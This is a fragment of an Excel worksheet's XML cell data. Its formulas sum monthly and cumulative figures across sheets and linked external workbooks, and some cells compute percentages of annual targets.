      </c>
      <c r="K69" s="194">
        <f>J69+'20'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]21'!$K$43+'[15]21'!$K$44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'[15]21'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]21'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'20'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]21'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'20'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]21'!$K$45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G71+'20'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'20'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]21'!$Q$80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G72+'20'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'20'!K72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G73+'20'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'20'!K73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G74+'20'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'20'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]21'!$Q$83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G75+'20'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'20'!K75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G76+'20'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'20'!K76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G77+'20'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'20'!K77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G78+'20'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'20'!K78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'[16]21'!$E$7</f>
        <v>761.94</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'20'!H79</f>
        <v>10878.58</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>158007.05</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]21'!$I$7</f>
        <v>392.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'20'!K79</f>
        <v>10411.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>152302.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]21'!$L$7</f>
        <v>5351.86</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.70372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'[16]21'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'20'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]21'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'20'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]21'!$Y$15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G81+'20'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'20'!K81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G82+'20'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'20'!K82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G83+'20'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'20'!K83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G84+'20'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'20'!K84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G85+'20'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'20'!K85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22/31</f>
        <v>0.709677419354839</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46013</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19846.78</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'21'!H5</f>
        <v>454792.17</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6609658.2</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>22721.29</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'21'!K5</f>
        <v>505947.879</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6656019.01</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>216312.115</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>57.8374639037432</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]22'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]22'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]22'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]22'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]22'!$U$101</f>
        <v>43.74375</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]22'!$V$101</f>
        <v>63.369452247191</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]22'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]22'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]22'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]22'!$D$23+'[11]22'!$D$17+'[12]22'!$D$17+'[13]22'!$D$25+'[14]22'!$D$8+'[14]22'!$D$15+'[15]22'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]22'!$E$23+'[11]22'!$E$17+'[12]22'!$E$17+'[13]22'!$E$25+'[14]22'!$E$8+'[14]22'!$E$15+'[15]22'!$E$7</f>
        <v>1162</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'21'!H6</f>
        <v>6590</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>282939.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]22'!$I$23+'[11]22'!$I$17+'[12]22'!$I$17+'[13]22'!$I$25+'[14]22'!$E$23+'[14]22'!$E$30+'[15]22'!$H$7</f>
        <v>812.24</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'21'!K6</f>
        <v>15864.15</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>278061.85</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]22'!$L$23+'[11]22'!$L$17+'[12]22'!$L$17+'[13]22'!$L$25+'[14]22'!$H$23+'[14]22'!$H$30+'[15]22'!$K$7</f>
        <v>22838.69</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]22'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]22'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]22'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]22'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]22'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]22'!$V$102</f>
        <v>33.300550093633</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]22'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]22'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]22'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]22'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]22'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'21'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]22'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'21'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]22'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]22'!$W$107</f>
        <v>125.950972104818</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]22'!$X$107</f>
        <v>127.007568009818</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]22'!$Y$107</f>
        <v>131.490395182206</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]22'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]22'!$U$107</f>
        <v>46.2973484848485</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]22'!$V$107</f>
        <v>31.9508426966292</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]22'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]22'!$R$107</f>
        <v>244.45</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]22'!$S$107</f>
        <v>2729.88</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]22'!$D$27+'[11]22'!$D$18+'[13]22'!$D$26+'[14]22'!$D$10+'[14]22'!$D$17+'[15]22'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]22'!$E$27+'[11]22'!$E$18+'[13]22'!$E$26+'[14]22'!$E$10+'[14]22'!$E$17+'[15]22'!$E$9</f>
        <v>2257</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'21'!H8</f>
        <v>45388</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>570924.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]22'!$I$27+'[11]22'!$I$18+'[13]22'!$I$26+'[14]22'!$E$25+'[14]22'!$E$32+'[15]22'!$H$9</f>
        <v>2070.59</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'21'!K8</f>
        <v>55431.83</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>563176.54</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]22'!$L$27+'[11]22'!$L$18+'[13]22'!$L$26+'[14]22'!$H$25+'[14]22'!$H$32+'[15]22'!$K$9</f>
        <v>31836.07</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]22'!$W$108</f>
        <v>128.402366863905</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]22'!$X$108</f>
        <v>132.392213642214</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]22'!$Y$108</f>
        <v>127.929372027692</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]22'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]22'!$U$108</f>
        <v>47.0909090909091</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]22'!$V$108</f>
        <v>28.6223080524344</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]22'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]22'!$R$108</f>
        <v>248.64</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]22'!$S$108</f>
        <v>2445.49</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]22'!$D$24+'[11]22'!$D$19+'[12]22'!$D$20+'[13]22'!$D$27+'[14]22'!$D$11+'[14]22'!$D$18+'[15]22'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]22'!$E$24+'[11]22'!$E$19+'[12]22'!$E$20+'[13]22'!$E$27+'[14]22'!$E$11+'[14]22'!$E$18+'[15]22'!$E$10</f>
        <v>12741</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'21'!H9</f>
        <v>320344</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4455732.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]22'!$I$24+'[11]22'!$I$19+'[12]22'!$I$20+'[13]22'!$I$27+'[14]22'!$E$26+'[14]22'!$E$33+'[15]22'!$H$10</f>
        <v>15306.69</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'21'!K9</f>
        <v>340824.519</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4438303.33</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]22'!$L$24+'[11]22'!$L$19+'[12]22'!$L$20+'[13]22'!$L$27+'[14]22'!$H$26+'[14]22'!$H$33+'[15]22'!$K$10</f>
        <v>90385.193</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]22'!$W$109</f>
        <v>258.32628909552</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]22'!$X$109</f>
        <v>266.059188336416</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]22'!$Y$109</f>
        <v>270.988887061533</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]22'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]22'!$U$109</f>
        <v>34.8143939393939</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]22'!$V$109</f>
        <v>34.8713717228464</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]22'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]22'!$R$109</f>
        <v>183.82</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]22'!$S$109</f>
        <v>2979.40999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]22'!$D$25+'[11]22'!$D$20+'[12]22'!$D$21+'[13]22'!$D$28+'[14]22'!$D$12+'[14]22'!$D$19+'[15]22'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]22'!$E$25+'[11]22'!$E$20+'[12]22'!$E$21+'[13]22'!$E$28+'[14]22'!$E$12+'[14]22'!$E$19+'[15]22'!$E$11</f>
        <v>2404</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'21'!H10</f>
        <v>54261</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>971788.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]22'!$I$25+'[11]22'!$I$20+'[12]22'!$I$21+'[13]22'!$I$28+'[14]22'!$E$27+'[14]22'!$E$34+'[15]22'!$H$11</f>
        <v>3112.5</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'21'!K10</f>
        <v>63465.42</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>960694.14</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]22'!$L$25+'[11]22'!$L$20+'[12]22'!$L$21+'[13]22'!$L$28+'[14]22'!$H$27+'[14]22'!$H$34+'[15]22'!$K$11</f>
        <v>52002.522</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]22'!$W$110</f>
        <v>271.090448013525</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]22'!$X$110</f>
        <v>249.787010255062</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]22'!$Y$110</f>
        <v>267.623831751975</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]22'!$T$110</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]22'!$U$110</f>
        <v>36.0132575757576</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]22'!$V$110</f>
        <v>34.5764279026217</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]22'!$Q$110</f>
        <v>11.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]22'!$R$110</f>
        <v>190.15</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]22'!$S$110</f>
        <v>2954.21</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]22'!$D$26+'[11]22'!$D$21+'[12]22'!$D$19+'[13]22'!$D$29+'[14]22'!$D$13+'[14]22'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]22'!$E$26+'[11]22'!$E$21+'[12]22'!$E$19+'[13]22'!$E$29+'[14]22'!$E$13+'[14]22'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'21'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]22'!$I$26+'[11]22'!$I$21+'[12]22'!$I$19+'[13]22'!$I$29+'[14]22'!$E$28+'[14]22'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'21'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]22'!$L$26+'[11]22'!$L$21+'[12]22'!$L$19+'[13]22'!$L$29+'[14]22'!$H$28+'[14]22'!$H$35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4831.20000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'21'!H12</f>
        <v>176338.73</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5118729.98</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>14972.67</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'21'!K12</f>
        <v>361858.035</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5390964.411</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>231633.580000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>52.7639134396471</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]22'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]22'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]22'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]22'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]22'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]22'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]22'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]22'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]22'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'21'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'21'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>42.5015743119359</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]22'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]22'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]22'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]22'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]22'!$U$68</f>
        <v>74.0473484848485</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]22'!$V$68</f>
        <v>71.7052902621723</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]22'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]22'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]22'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2211</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'21'!H14</f>
        <v>60836</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1025379.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>1384</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'21'!K14</f>
        <v>116161.445</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1909105.551</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>57613.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]22'!$W$71</f>
        <v>206.375</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]22'!$X$71</f>
        <v>218.486486486486</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]22'!$Y$71</f>
        <v>213.821967936803</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]22'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]22'!$U$71</f>
        <v>52.5568181818182</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]22'!$V$71</f>
        <v>50.374531835206</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]22'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]22'!$R$71</f>
        <v>277.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]22'!$S$71</f>
        <v>4304.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'21'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>196.469999999999</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'21'!K15</f>
        <v>6409.06</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>121165.56</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]22'!$W$72</f>
        <v>67.875</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]22'!$X$72</f>
        <v>63.9761335069812</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]22'!$Y$72</f>
        <v>61.48631290822</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]22'!$T$72</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]22'!$U$72</f>
        <v>62.532196969697</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]22'!$V$72</f>
        <v>51.4825608614232</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]22'!$Q$72</f>
